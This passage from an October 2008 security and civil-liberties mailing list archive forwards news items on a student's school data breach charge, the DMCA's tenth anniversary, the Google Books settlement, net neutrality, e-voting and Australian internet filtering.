He and a peer allegedly gained access to a file containing the personal information of 250 workers because of a district-wide error in setting up a new server. After accessing the information, he sent an email alerting the principal to the breach and signed it "A student." With the help of the district's IT department, the principal identified the boy as the culprit.

"The kid committed an intentional criminal act," state trooper Maureen Tuffey told The Times Union. "He deceitfully used someone else's name and password so he would not get caught and was looking to profit from his criminal act."

All that was needed to access the information was a district password.
School officials have admitted that thousands of students, faculty and employees could have accessed the same file for up to two weeks. The file contained the social security numbers, driver's license numbers and home addresses of past and present employees, most of whom were bus drivers.

Since news of the charges was reported late last week, hackers have criticized administrators for turning the student into a scapegoat for the school board's shoddy computer security. We're inclined to agree, although it'd be nice if we knew more about the specifics of the email the fellow sent his principal. Additional coverage is available here and here.

From rforno at infowarrior.org Tue Oct 28 20:12:06 2008
From: rforno at infowarrior.org (Richard Forno)
Date: Tue, 28 Oct 2008 16:12:06 -0400
Subject: [Infowarrior] - DMCA turns 10 today
Message-ID:

If you're wondering whom to thank for the Web 2.0 explosion in interactive websites, consider sending a bouquet to Congress. Today's internet is largely an outgrowth of the much-reviled Digital Millennium Copyright Act that lawmakers passed in 1998, and President Clinton signed into law exactly a decade ago Tuesday.

< - >

http://blog.wired.com/27bstroke6/2008/10/ten-years-later.html

From rforno at infowarrior.org Tue Oct 28 22:45:02 2008
From: rforno at infowarrior.org (Richard Forno)
Date: Tue, 28 Oct 2008 18:45:02 -0400
Subject: [Infowarrior] - EFF: 10 years of DMCA (Report)
Message-ID:

October 27th, 2008

EFF Marks 10th Anniversary of DMCA with Report on Law's Unintended Consequences
Ten-Year Legacy of Harm to Fair Use, Free Speech
http://www.eff.org/press/archives/2008/10/27

San Francisco - Ten years ago Tuesday, the Digital Millennium Copyright Act (DMCA) was signed into law. In a report released to mark the anniversary, the Electronic Frontier Foundation (EFF) documents the ways in which this controversial law has harmed fair use, free speech, scientific research, and legitimate competition.
"Unintended Consequences: Ten Years Under the DMCA" focuses on the most notorious aspect of the law: its ban on "circumventing" digital rights management (DRM) and "other technical protection measures." Instead of protecting against copyright infringement, this ban has routinely been used to stymie consumers, scientists, and small businesses. "Unintended Consequences" collects reports of the law's most egregious abuses over the last decade. In 2003, for example, Lexmark used the DMCA to block distribution of chips that allow the refilling of laser toner cartridges. In 2006, computer security researchers at Princeton delayed disclosure of a dangerous hidden program in some Sony CDs based on fears of DMCA liability. Meanwhile, the DMCA has not prevented digital piracy. DRM systems are consistently and routinely broken almost immediately upon their introduction. "Over the last ten years, the DMCA has done far more harm to fair use, free speech, scientific research, and competition than it has to digital piracy. Measured from the perspective of the public, it's been a decade of costs, with no benefits," said EFF Senior Intellectual Property Attorney Fred von Lohmann. "The music industry has given up on DRM, and Hollywood now relies on DRM principally to stop innovation that it doesn't like. It's time for Congress to consider giving up on this failed experiment to back up DRM systems with misguided laws." 
For "Unintended Consequences: Ten Years Under the DMCA":
http://www.eff.org/wp/unintended-consequences-ten-years-under-dmca

For more on the DMCA:
http://www.eff.org/issues/dmca

Contact:
Fred von Lohmann
Senior Intellectual Property Attorney
Electronic Frontier Foundation
fred at eff.org

From rforno at infowarrior.org Tue Oct 28 22:45:56 2008
From: rforno at infowarrior.org (Richard Forno)
Date: Tue, 28 Oct 2008 18:45:56 -0400
Subject: [Infowarrior] - TSA vows relaxation of carry-on liquid limits
Message-ID: <0DAA2DB2-0E55-4725-AC1A-9673BEA3EEF2@infowarrior.org>

TSA vows relaxation of carry-on liquid limits
http://www.theregister.co.uk/2008/10/28/liquid_restrictions_lifted/
Pulling the curtain on 'security theater'
By Dan Goodin in San Francisco
Posted in Security, 28th October 2008 20:26 GMT

Airline passengers on both sides of the Atlantic could be free to carry larger bottles of liquids in carry-on luggage under a two-year plan to relax current security rules that sharply restrict the amount of shampoo, hand lotion, and other types of liquids that can be brought in a plane cabin.

Under an oft-criticized plan implemented a few years ago, liquids must be stored in containers no bigger than three ounces. Those containers, in turn, must be stowed in a clear, zip-locked bag no bigger than one quart, and each passenger is limited to bringing a single bag in carry-on luggage. Critics have referred to the highly inconvenient restrictions as "security theater," saying they do little to actually prevent terrorists from smuggling explosives onto planes.

The US Transportation Security Administration (TSA) wants you to know it feels your pain and is taking steps to end it. Under a plan outlined here, an official said size restrictions will be removed by the end of 2009, although liquids will still have to be placed in a separate bin when passing through security checkpoints. By the end of 2010, there will be no restrictions.

"We are deploying the best technology and training as fast as we can get it," the official wrote. "The goal is to remove all the restrictions on liquids when we have automated systems that can accurately separate threat from non-threat liquids."

The TSA is working with its counterparts in Europe, Canada, and Australia to design "common design standards" to ensure the new policy is in harmony with those in other countries.

Enabling the change, the TSA official wrote, are new screening technologies that can tell the difference between hair gel and liquid explosives. The TSA is in the process of installing advanced technology X-ray machines throughout the country. The new machines should be in place by the end of 2009, but it will take an additional year for them to be outfitted with software that can identify threatening liquids. Computed tomography scanners, explosives trace detection equipment, and spectrometers are also being deployed in increasing numbers to ferret out threatening liquids.

From rforno at infowarrior.org Wed Oct 29 13:28:16 2008
From: rforno at infowarrior.org (Richard Forno)
Date: Wed, 29 Oct 2008 09:28:16 -0400
Subject: [Infowarrior] - Authors, Publishers, and Google Reach Landmark Settlement
Message-ID:

Authors, Publishers, and Google Reach Landmark Settlement
Copyright Accord Would Make Millions More Books Available Online
http://www.google.com/intl/en/press/pressrel/20081027_booksearchagreement.html

NEW YORK, NY (October 28, 2008) - The Authors Guild, the Association of American Publishers (AAP), and Google today announced a groundbreaking settlement agreement on behalf of a broad class of authors and publishers worldwide that would expand online access to millions of in-copyright books and other written materials in the U.S. from the collections of a number of major U.S. libraries participating in Google Book Search.
The agreement, reached after two years of negotiations, would resolve a class-action lawsuit brought by book authors and the Authors Guild, as well as a separate lawsuit filed by five large publishers as representatives of the AAP's membership. The class action is subject to approval by the U.S. District Court for the Southern District of New York.

The agreement promises to benefit readers and researchers, and enhance the ability of authors and publishers to distribute their content in digital form, by significantly expanding online access to works through Google Book Search, an ambitious effort to make millions of books searchable via the Web. The agreement acknowledges the rights and interests of copyright owners, provides an efficient means for them to control how their intellectual property is accessed online and enables them to receive compensation for online access to their works.

If approved by the court, the agreement would provide:

* More Access to Out-of-Print Books -- Generating greater exposure for millions of in-copyright works, including hard-to-find out-of-print books, by enabling readers in the U.S. to search these works and preview them online;

* Additional Ways to Purchase Copyrighted Books -- Building off publishers' and authors' current efforts and further expanding the electronic market for copyrighted books in the U.S., by offering users the ability to purchase online access to many in-copyright books;

* Institutional Subscriptions to Millions of Books Online -- Offering a means for U.S. colleges, universities and other organizations to obtain subscriptions for online access to collections from some of the world's most renowned libraries;

* Free Access From U.S. Libraries -- Providing free, full-text, online viewing of millions of out-of-print books at designated computers in U.S. public and university libraries; and

* Compensation to Authors and Publishers and Control Over Access to Their Works --
Distributing payments earned from online access provided by Google and, prospectively, from similar programs that may be established by other providers, through a newly created independent, not-for-profit Book Rights Registry that will also locate rightsholders, collect and maintain accurate rightsholder information, and provide a way for rightsholders to request inclusion in or exclusion from the project.

Under the agreement, Google will make payments totaling $125 million. The money will be used to establish the Book Rights Registry, to resolve existing claims by authors and publishers and to cover legal fees.

The settlement agreement resolves Authors Guild v. Google, a class-action suit filed on September 20, 2005 by the Authors Guild and certain authors, and a suit filed on October 19, 2005 by five major publisher-members of the Association of American Publishers: The McGraw-Hill Companies, Inc. (NYSE: MHP); Pearson Education, Inc. and Penguin Group (USA) Inc., both part of Pearson (LSE: PSON; NYSE: PSO); John Wiley & Sons, Inc. (NYSE: JWa and JWb); and Simon & Schuster, Inc. part of CBS Corporation (NYSE: CBS.A and CBS). These lawsuits challenged Google's plan to digitize, search and show snippets of in-copyright books and to share digital copies with libraries without the explicit permission of the copyright owner.

Holders worldwide of U.S. copyrights can register their works with the Book Rights Registry and receive compensation from institutional subscriptions, book sales, ad revenues and other possible revenue models, as well as a cash payment if their works have already been digitized.

Libraries at the Universities of California, Michigan, Wisconsin, and Stanford have provided input into the settlement and expect to participate in the project, including by making their collections available. Along with a number of other U.S.
libraries that currently work with Google, their significant efforts to preserve, maintain and provide access to books have played a critical role in achieving this agreement and, through their anticipated participation, they are furthering such efforts while making books even more accessible to students, researchers and readers in the U.S. It is expected that additional libraries in the U.S. will participate in this project in the future.

Google Book Search users in the United States will be able to enjoy and purchase the products and services offered under the project. Outside the United States, the users' experience with Google Book Search will be unchanged, unless the offering of such products and services is authorized by the rightsholder of a book.

"It's hard work writing a book, and even harder work getting paid for it," said Roy Blount Jr., President of the Authors Guild. "As a reader and researcher, I'll be delighted to stop by my local library to browse the stacks of some of the world's great libraries. As an author, well, we appreciate payment when people use our work. This deal makes good sense."

"This historic settlement is a win for everyone," said Richard Sarnoff, Chairman of the Association of American Publishers. "From our perspective, the agreement creates an innovative framework for the use of copyrighted material in a rapidly digitizing world, serves readers by enabling broader access to a huge trove of hard-to-find books, and benefits the publishing community by establishing an attractive commercial model that offers both control and choice to the rightsholder."

"Google's mission is to organize the world's information and make it universally accessible and useful. Today, together with the authors, publishers, and libraries, we have been able to make a great leap in this endeavor," said Sergey Brin, co-founder & president of technology at Google. "While this agreement is a real win-win for all of us, the real victors are all the readers.
The tremendous wealth of knowledge that lies within the books of the world will now be at their fingertips."

For more information about this agreement, including information about whether you may be a class member, please visit http://books.google.com/booksrightsholders . Class members include authors (the Author Sub-Class) and publishers (the Publisher Sub-Class), and their heirs and successors, of books and other written works protected by U.S. copyright law.

A teleconference for the media will be held today, Tuesday, October 28, 2008, at 10:30 a.m. Eastern. To participate, reporters in the U.S. should dial 877-340-7913, and reporters internationally should dial 719-325-4845. Please tell the operator you would like to join the "Authors, Publishers and Google" call.

About the Authors Guild
The Authors Guild, representing more than 8,000 authors, is the nation's largest and oldest society of published authors and the leading writers' advocate for fair compensation, effective copyright protection, and free expression. For more information, visit www.authorsguild.org .

About the Association of American Publishers
The AAP is the national trade association of the U.S. book publishing industry. AAP's more than 300 members include most of the major commercial publishers in the United States, as well as smaller and non-profit publishers, university presses and scholarly societies. AAP members publish hardcover and paperback books in every field, educational materials for the elementary, secondary, postsecondary, and professional markets, scholarly journals, computer software, and electronic products and services. The protection of intellectual property rights in all media, the defense of the freedom to read and the freedom to publish at home and abroad, and the promotion of reading and literacy are among the Association's highest priorities. For further information, see www.publishers.org.

About Google Inc.
and Google Book Search
Google's innovative search technologies connect millions of people around the world with information every day. Google Book Search was launched in 2004, and today enables the full text searching of more than a million books online. More than 20,000 publishers and 28 libraries around the world currently work with Google to market their books through the service. Google is headquartered in Silicon Valley with offices throughout the Americas, Europe and Asia. For more information, visit www.google.com and books.google.com.

Contacts:
Authors Guild: Matthew Traub (matthew_traub at dkcnews.com) 212-981-5207, Joe DePlasco (joe_deplasco at dkcnews.com), 212-981-5125
Association of American Publishers: Judy Platt, jplatt at publishers.org, 202-220-4551
Google: Megan Lamb, press at google.com, 650-930-3555

The Author Sub-Class and the Authors Guild, Inc. are represented by Michael J. Boni and Joanne Zack of Boni & Zack LLC, Bala Cynwyd, PA, 610-822-0200, www.bonizack.com, bookclaims at bonizack.com.

The Publisher Sub-Class, the Association of American Publishers, Inc., The McGraw-Hill Companies, Inc., Pearson Education, Inc., Penguin Group (USA) Inc., John Wiley & Sons, Inc., and Simon & Schuster, Inc. are represented by Jeffrey P. Cunard and Bruce P. Keller of Debevoise & Plimpton LLP, New York, NY, 212-909-6000, www.debevoise.com, bookclaims at debevoise.com .

From rforno at infowarrior.org Wed Oct 29 17:57:51 2008
From: rforno at infowarrior.org (Richard Forno)
Date: Wed, 29 Oct 2008 13:57:51 -0400
Subject: [Infowarrior] - Google, Microsoft help found anti-censorship group
Message-ID: <27A6E6D6-F014-43BE-80C6-89A5B0E735F0@infowarrior.org>

Google, Microsoft help found anti-censorship group

Google, Microsoft and Yahoo are among the founding members of a new anti-censorship group called the Global Network Initiative, reports indicate.
The organization also has the backing of investor, human rights and press freedom groups, such as the Center for Democracy and Technology. The GNI is specifically aimed at forming a consistent approach to dealing with countries that block free speech on the Internet, such as China. Many governments around the world filter search results, or simply prevent citizens from accessing certain websites.

Participation in GNI marks a reversal of policy by the three tech companies, which have in the past been accused of collaborating with governments to censor websites, or even helping to hunt down political dissidents. It is in fact uncertain to what degree the corporations will actually protest government actions; human rights motions were voted down at the last Google shareholder meeting, and Microsoft is said to have published a paper indicating it would continue to follow local censorship restrictions, regardless of whether they violate rights held elsewhere.

http://www.electronista.com/articles/08/10/29/new.anti.censorship.group/

From rforno at infowarrior.org Thu Oct 30 02:22:56 2008
From: rforno at infowarrior.org (Richard Forno)
Date: Wed, 29 Oct 2008 22:22:56 -0400
Subject: [Infowarrior] - E-Speech: The (Uncertain) Future of Free Expression
Message-ID: <45548344-FB4C-4E99-8826-07A8BE23D9BE@infowarrior.org>

E-Speech: The (Uncertain) Future of Free Expression
http://www.truthdig.com/report/item/20081024_e_speech_the_uncertain_future_of_free_expression/
Posted on Oct 28, 2008
By Aram Sinnreich and Masha Zager

Imagine this: It's the day before your daughter's birthday. She lives in another state, so you make a video of the rest of the family singing "Happy Birthday to You" on your camcorder and put the videotape in a box with her address on it. But at the post office, you're told the box will take two weeks to deliver unless you pay your daughter's local mail carrier an extra delivery fee.
So instead, you write her a letter describing the video and including the lyrics to "Happy Birthday to You." She never receives the letter; unbeknownst to you, the post office has opened it en route, and, seeing that you've enclosed copyrighted materials (yes, the "Happy Birthday" song is copyrighted), has decided not to deliver the envelope to her.

You write her another letter, without the song lyrics, and although it arrives on her doorstep intact, she can't open it because you used a large manila envelope and her electric letter opener works only on size A2, A6 and A7 envelopes.

You decide to fly out and deliver your birthday wishes in person. After the usual hour-long wait at the airport, you reach the metal detector. A TSA officer asks you to come to a private room, where you are searched and questioned, and left waiting for six hours. The airport security officers repeatedly ask you about your plans for a future visit to China, which is strange, because you mentioned these plans only once, during a private conversation with a friend.

Finally you are allowed to board a plane, and a few hours later your daughter meets you when you land. You give her a big hug and try to sing "Happy Birthday." However, when you open your mouth, no sound comes out. You can speak perfectly well, but for some reason you are unable to sing.

If this scenario sounds absurd, that's because it is. If it sounds unrealistic, that's because you haven't been paying attention. Although no one is slowing down or opening your posted letters, spying on your face-to-face conversations or restricting your physical ability to make music, all of these barriers to free speech -- and more -- are becoming increasingly prevalent in the world of digital communications.
And as tools like the Web, e-mail, voice over IP, Internet video, mobile phones and peer-to-peer file sharing become increasingly vital to our relationships with family, friends, colleagues, businesses and government institutions, these limitations on speech and threats to our privacy are becoming increasingly important civil rights issues.

When we talk about unequal access to computers and other digital communication technologies, we speak about the "digital divide." When we talk about the concentrated ownership of the Internet access business, we can point to a simple, powerful statistic: Four companies control nearly 60 percent of the American ISP market, and four companies control nearly 90 percent of the American mobile phone market. But there's no simple way to talk about the interrelated issues of electronic surveillance, network neutrality, asymmetry and "walled garden" technologies that collectively threaten free expression in the digital world. Without a name for the big picture, it's difficult to do anything about it. Imagine trying to reverse global warming, reduce pollution and save species from extinction without the umbrella of the word environmentalism connecting the issues.

Therefore, we propose the term e-speech as a concept to unite these issues, and to discuss potential solutions to the problem they collectively pose. First, however, we should briefly discuss the issues themselves.

Most of us have read about the surveillance of our phone conversations, and the recent amendment to the Foreign Intelligence Surveillance Act (FISA) retroactively granting immunity to companies like AT&T and Verizon for illegally handing our private information over to the federal government. However, fewer people are aware of the Stored Communications Act (SCA), which the government has used to obtain access to Web-based e-mail without getting a warrant or notifying the account holder.
Similarly, the Anti-Counterfeiting Trade Agreement (ACTA), an international treaty currently under negotiation, may allow customs officials to search our computers, MP3 players and other electronic devices for unpermissioned content when we travel, and may force ISPs to disclose more information about our online activities to copyright owners claiming infringement. ACTA negotiations have been held in secret, and what little we know is the result of leaks. Despite not telling us much about it, the Office of the United States Trade Representative (USTR) says it is trying to "complete the new agreement as quickly as possible." The Electronic Frontier Foundation and Public Knowledge recently filed suit against the USTR, demanding more information about ACTA before it's actually ratified.

Another potential threat to civil liberties online is the end of network neutrality, or nondiscriminatory delivery of online communications. Some ISPs have begun to argue that they should be allowed to collect an extra fee from the application provider for delivering an e-mail, Web page or video to an end user. Former AT&T CEO Ed Whitacre summed up their justification well, arguing that "for a Google or Yahoo or Vonage or anybody to expect to use these pipes [for] free is nuts!" However, this argument doesn't hold much water when you consider that both the originator and the end user are paying for their Internet access; in essence, the ISPs would like to get paid by three separate parties to deliver a single e-mail or voice message from point A to point B.

In reality, the purpose of such fees would be to protect ISPs' video services from competition by Internet-based video (such as YouTube), and ISPs' phone services from competition by Internet-based VoIP (such as Skype). And for any Internet communications that did take place, major publishers and advertisers could outbid the rest of us, consigning us to the slow lane.
In the short term, this could make Web-based services like audio/video chatting and video sharing more expensive. In the longer term, it could bring an end to the proliferation of new voices and creative new services that we've gotten used to seeing on the Web.

There is no legislation supporting or rejecting net neutrality (this may change soon; several bills have been introduced on both sides); however, net neutrality currently stands as Federal Communications Commission policy. Even so, there are many cases in which Internet providers have apparently broken the rules. Most famously, Comcast, the nation's second-largest ISP, was caught throttling bandwidth for customers who used the BitTorrent file sharing protocol. Although the FCC ruled that the company had to stop, Comcast has appealed the decision. In the meantime, Comcast has amended its broadband user policy, capping monthly usage at 250 gigabytes (not much for fans of digital video).

Yet another hindrance to free speech and open communications online is asymmetrical access (the "A" in "ADSL"). Nearly all broadband ISPs -- even in the age of YouTube, Skype and MySpace -- offer downstream speeds (from the Internet to the user) that are much faster than upstream speeds (from the user to the Internet). This is a legacy of the cable networks' origins in the unidirectional world of TV programming, and of the antiquated vision of the Internet as an "information superhighway" by which consumers would access information. Few people anticipated that Americans would be as interested in producing content as they were in consuming it, or that they might want to use video for communicating. So regulators failed to address communication to the Internet, and the original vision of the Internet became enshrined in industrywide technology standards. Today, most providers still use technologies that are downstream-oriented.
A few new technologies (Active Ethernet, GPON, VDSL2) support high upstream speeds, but it will take years, and hundreds of billions of dollars, to upgrade all of our networks to use them.

Finally, free speech online is threatened by "walled garden" services and technologies, in which the ISP or wireless provider determines what content the user has access to, what software the user can install, and even what formats are permissible for encoding audio or video. Walled garden services for the PC had their heyday in the 1990s (remember AOL, CompuServe and Prodigy?), but we are only beginning to see the extent to which they will dominate the Internet on wireless devices.

A great example of a walled garden is Apple's iPhone. Spending several hundred dollars to purchase one doesn't give you permission to install the software of your choice or distribute software to other users. Apple has already used its power to block software providers attempting to compete with Apple's own software, such as the e-mail application that comes bundled with the device. Even more worrisome, Apple CEO Steve Jobs has acknowledged that iPhones are equipped with a "kill switch" that allows the company to remotely delete applications from your phone. The company calls this a last-ditch security protocol to disable malware, but it comes at the cost of consumer control. Imagine if General Electric could remotely remove food from your fridge that it deemed unsafe. Now imagine that GE is also one of the top providers of meat, cheese and veggies to American supermarkets. Clearly, this is not a combination in the consumer's best interest. (To be fair, most wireless phones have even more "walls" and less "garden" than the iPhone does.)

What are we to do about these threats to liberty, privacy and autonomy in the digital world? In view of the problems we've discussed, unfettered Internet access requires either:

* Laws that strictly protect digital privacy and net neutrality, deter abuse of market power, and encourage investment in new ultra-broadband technologies; or

* User-owned or unmanaged networks with very-high-speed connections.

For the sake of argument, let's dismiss the first of these as impractical, or at least unlikely in the current political climate. But how about the second?

In theory, you could buy a length of fiber optic cable (which can support tremendous symmetrical bandwidth over long distances) and run it directly from your house to the nearest Internet point of presence (POP). You then buy an electronic gadget for each end of the cable. You plug one gadget into your computer and the other one into the Internet. Now you can upload and download whatever you like, and there's no ISP to tell you what you can or can't do -- or turn over your records to some inquisitive government agency.

Is this any more feasible than passing a bunch of laws opposed by telecom providers? Well, not exactly. It's expensive, and complicated. It won't work unless there's also fiber at the POP. And what will your neighbor say when you run your cable through her backyard?

The solution would be viable if you were, say, a hospital with a lot of money and an IT staff and a need to upload and download gigantic medical image files. In fact, customer-owned fiber is a reality today for such large organizations. For smaller companies, however, "condominium fiber" may be a better option. Condo fiber providers install the fiber backbone and negotiate rights of way with the neighbors. Then they sell individual strands of fiber to their customers and collect a small annual maintenance fee.

For individuals, no such solution has been developed. But different organizations are inching toward it from different angles, and if we can take the best aspects of each approach, an e-speech solution might emerge. Here are four of the partial solutions being proposed:

* In Canada, CANARIE -- the public/private organization that runs Canada's advanced research network -- is trying to jump-start a residential condo fiber project. Bill St. Arnaud, CANARIE's chief research officer, asked residents in an Ottawa neighborhood whether they wanted their own fiber connections to the Internet; about a third said they did. He then convinced a business fiber provider to run a trunk line through the neighborhood, and to agree to run a connection to the nearest Internet POP for any neighborhood resident who could pay about $1,500. He also worked out a complex financing scheme (he calls it "green broadband" -- don't ask) to make the fiber easily affordable for those who can't buy it outright. At the POP, customers will have to connect their fiber to an ISP's equipment. In theory, customers can choose among ISPs. But there's a slight hitch: As of this writing, no ISPs have agreed to participate.

* Many Swedish cities operate publicly owned systems that work in ways similar to the CANARIE scheme. These municipal fiber networks are open to any ISP -- some have dozens of competing ISPs -- and the operator will run fiber to any building where the owner pays for a connection. Individual homeowners finance their fiber connections by adding around $10 to their monthly mortgage payments (a better investment than granite countertops in terms of resale price). As in the CANARIE plan, customers can decide whether and when to install the fiber; once connected, they can change ISPs at the click of a mouse. This model is starting to catch on in other European countries, such as the Netherlands. In the U.S. there are about 60 municipal fiber networks -- some states allow them, others don't -- and a few have succeeded in attracting multiple ISPs. None of them, however, put the customer in charge of connecting to the network, even though customer-controlled fiber helps attract ISPs due to the low investment costs and high degree of customer loyalty.

* A company called Copowi (short for Community Powered Internet) was launched in 2007 as the first strictly "net neutral" ISP. It now offers broadband services in 12 Western states over DSL lines wholesaled by Verizon, AT&T and Qwest. Copowi promises not to block, degrade or modify data or to discriminate for commercial advantage on the basis of source or destination -- with exceptions for necessities such as spam prevention and, of course, law enforcement. It also provides encryption for e-mail and Web surfing, both to help users protect their privacy and to make it more difficult for network owners to implement non-neutral access. After a year in business, Copowi has about 4,000 customers, according to founding partner George Matafonov. Eventually it would like to partner with more network owners or even to build its own networks, but first it needs to develop a larger subscriber base, which isn't easy for a niche player.

* New "mesh" wireless networking gear -- which lets people share Internet access something like BitTorrent lets them share files -- has made it easy and inexpensive to create decentralized networks. Wireless mesh networks are now being used in locations as diverse as low-income housing projects, Indian reservations and South African schools. Citywide (or nearly citywide) mesh networks are being built in places like San Francisco and Urbana, Ill. Internet access becomes much less expensive because neighbors can share a commercial DSL connection in the same way that co-workers in an office do. However, mesh networks tend to be less decentralized in practice than they are in theory, and for technical reasons any really large mesh network seems to require a degree of structure and management. And even a decentralized mesh network is dependent on an ISP to communicate with others outside the neighborhood.

All of these efforts offer partial solutions to the problem of guaranteeing free expression over digital networks.
Remember that the components of the problem we identified include unwarranted government intrusion; ISP self-dealing (net neutrality and the walled garden); and asymmetry. Looking at each of the solutions in turn:

Private condo fiber, if it ever exists, will solve the asymmetry problem nicely and give the customer some ammunition against ISP self-dealing. However, it will do nothing to combat government intrusion.

Public condo fiber (the Swedish solution) will face an uphill battle in the U.S., where phone and cable companies routinely delay municipal broadband projects with nuisance lawsuits and sometimes derail them altogether with legislation. However, when public fiber networks are built, they solve the asymmetry problem. And, if they attract competing service providers, they may help counter ISP self-dealing. Also, local governments may be able to stand up to unwarranted federal law-enforcement demands more effectively than private operators can, though the odds of this aren't great.

Net neutral ISPs (such as Copowi) are a terrific solution to net neutrality and walled-garden problems, but they can't address the asymmetry issue because they rely on existing network technology. This solution also fails to address governmental intrusions on privacy, because Copowi is legally obligated, just as AT&T, Comcast and the other large ISPs are, to cooperate with these intrusions.

Decentralized wireless mesh networks offer some hope of protecting freedom of communications within the network, if not between the network and the public Internet. As community wireless activist Sascha Meinrath writes, "What happens when a group of friends get together and buys a single line that is then shared among them? What happens when an apartment building buys a line and shares it? What happens when a community or neighborhood gets a line and shares it? ... Who 'owns' an ownerless network?
Because that (non)entity is required by [law] to provide surveillance capabilities on that network ... [it] represents an unenforceable mandate."

But wireless mesh networks are not well equipped to handle the other problems we've discussed. Because a wireless network can't communicate with the Internet until it finds a wire, it is dependent on a single ISP. Ultimately it is limited by the ISP's access speeds and network management policies.

If wireless devices were ever to become powerful and prevalent enough for the mesh to replace much of the Internet as we know it, every mobile phone and laptop could become a voluntary peer in a global community of equals, without oversight or restrictions. Alternatively, if virtualization, a technology that slices up computers into multiple "virtual" machines, is ever successfully applied to the hardware at the Internet POP (right now it's busy transforming the corporate data center), we could conceivably all afford to be our own ISPs someday. But the limitations of current technology -- as well as the opposition of ISPs and telcos, fighting to fend off what they see as a doomsday scenario -- make these blissful utopias unlikely anytime soon.

In the meantime, keeping in mind our mantra of "e-speech," we can continue to push federal regulators and access providers to support net neutrality and lower their garden walls, and we can continue to experiment with new models for community-owned and decentralized access. Most important, however, we have to remain aware of our civil liberties in the Digital Age, and to realize how easily -- and invisibly -- they can be removed.
From rforno at infowarrior.org Thu Oct 30 03:14:23 2008
From: rforno at infowarrior.org (Richard Forno)
Date: Wed, 29 Oct 2008 23:14:23 -0400
Subject: [Infowarrior] - MD, VA, other states ditching e-voting machines
Message-ID: <6EA78FE4-5C62-4BC7-AC87-189E86F4E0F2@infowarrior.org>

Paper Ballot Has Md.'s, Va.'s Vote
2 States Plan to Ditch Electronic Machines, Part of a Rapid National Reversal
By Christian Davenport
Washington Post Staff Writer
Thursday, October 30, 2008; B01

Goodbye, electronic voting. Farewell, fancy touch screen. Maryland and Virginia are going old school after Tuesday's election.

Maryland will scrap its $65 million electronic system and go back to paper ballots in time for the 2010 midterm elections -- and will still be paying for the abandoned system until 2014. In Virginia, localities are moving to paper after the General Assembly voted last year to phase out electronic voting machines as they wear out.

It was just a few years ago that electronic voting machines were heralded as a computerized panacea to the hanging chad, a state-of-the-art system immune to the kinds of hijinks and confusion that some say make paper ballots vulnerable. But now, after concern that the electronic voting machines could crash or be hacked, the two states are swinging away from the systems, saying paper ballots filled out by hand are more reliable, especially in a recount.

The trend reflects a national movement away from electronic voting machines. About a third of all voters will use them Tuesday, down from a peak of almost 40 percent in 2006, according to Election Data Services, a Manassas-based consulting firm specializing in election administration. Every jurisdiction that has changed election systems since 2006 has gone to paper ballots read by optical scan machines, said Kimball Brace, the firm's president. And for the first time in the country's history, fewer jurisdictions will be using electronic machines than in the previous election, he said.
"The battle for the hearts and minds of voters on whether electronic systems are good or bad has been lost," Brace said. The academics and computer scientists who said they were unreliable "have won that battle." < - > http://www.washingtonpost.com/wp-dyn/content/article/2008/10/29/AR2008102904105_pf.html From rforno at infowarrior.org Thu Oct 30 16:15:17 2008 From: rforno at infowarrior.org (Richard Forno) Date: Thu, 30 Oct 2008 12:15:17 -0400 Subject: [Infowarrior] - Secret Buildings You May Not Photograph, Part 643 Message-ID: <38384FB3-E27E-404D-8C59-5410250B82A2@infowarrior.org> Secret Buildings You May Not Photograph, Part 643 http://blog.washingtonpost.com/rawfisher/2007/07//secret_buildings_you_may_not_p.html If you happen by 3701 N. Fairfax Drive in Arlington and decide you have a sudden craving for a photograph of a generic suburban office building, and you point your camera at said structure, you will rather quickly be greeted by uniformed security folks who will demand that you delete the image and require that you give up various personal information. When Keith McCammon unwittingly took a picture of that building, he was launched on an odyssey that has so far involved an Arlington police officer, the chief of police and the defense of the United States of America. McCammon could not have been expected to know when he wandered by the building that it houses the Defense Advanced Research Projects Agency, a low-profile wing of the Defense Department that conducts all manner of high-tech research that evolves into weapons systems and high-order strategery. DARPA's presence at 3701 N. Fairfax is hardly a government secret-- Google finds nearly 10,000 pages listing the agency's use of the building. But there's no big fat sign on the building, so how was McCammon to know that this was a building he dared not photograph? And why would the government care if anyone took a picture of the exterior of an office building? 
This is as silly and hypersensitive as the now-common harassment of people who innocently take pictures of random federal buildings in the District. McCammon decided to fight back. He demanded to know why he had been stopped, why the government needed his personal information, and why any record of the incident should be kept in government records. He got quick, polite responses from Arlington officials. "I hope that you would agree that the security of any such building is of great importance and every law enforcement officer is duty bound to investigate all suspicious activity," wrote Arlington Acting Police Chief Daniel Murray. "I am certainly not implying that a person taking photographs is inherently 'suspicious,' but when the appearance is that the subject of a photograph is a government installation, officers have a duty to ensure the safety of the occupants of this structure." Hmmm. Any government installation? This overly broad approach to security is why we end up with ridiculous horror stories about innocent tourists getting hassled for taking photos of the Lincoln Memorial or the Department of the Interior. The good news here is that Arlington police didn't take a report or create a file on McCammon. The bad news is that they did pass his information along to "the internal security agency for this installation." Which means that somewhere in the vast security apparatus that we have constructed since 9/11--utterly ignoring the fact that the Soviet empire collapsed under the weight of its own paranoid security apparatus--there is now a report on Keith McCammon, photographer. The bottom line is that McCammon was caught in a classic logical trap. If he had only known the building was off-limits to photographers, he would have avoided it. But he was not allowed to know that fact. "Reasonable, law-abiding people tend to avoid these types of things when it can be helped," McCammon wrote.
"Thus, my request for a list of locations within Arlington County that are unmarked, but at which photography is either prohibited or discouraged according to some (public or private) policy. Of course, such a list does not exist. Catch-22." The only antidote to this security mania is sunshine. Only when more and more Americans do as McCammon has done and take the time and effort to chronicle these excesses and insist on answers from authorities will we stand a chance of restoring balance and sanity to the blend of liberty and security that we are madly remixing in these confused times. From rforno at infowarrior.org Fri Oct 31 12:17:05 2008 From: rforno at infowarrior.org (Richard Forno) Date: Fri, 31 Oct 2008 08:17:05 -0400 Subject: [Infowarrior] - Oz to implement mandatory internet censorship Message-ID: <305F76C2-C37E-450E-94F1-738263CFBF81@infowarrior.org> Australia to implement mandatory internet censorship Article from: Herald Sun http://www.news.com.au/heraldsun/story/0,21985,24568137-2862,00.html October 29, 2008 12:02pm AUSTRALIA will join China in implementing mandatory censoring of the internet under plans put forward by the Federal Government. The revelations emerge as US tech giants Google, Microsoft and Yahoo, and a coalition of human rights and other groups unveiled a code of conduct aimed at safeguarding online freedom of speech and privacy. The government has declared it will not let internet users opt out of the proposed national internet filter. The plan was first created as a way to combat child pornography and adult content, but could be extended to include controversial websites on euthanasia or anorexia. Communications minister Stephen Conroy revealed the mandatory censorship to the Senate estimates committee as the Global Network Initiative, bringing together leading companies, human rights 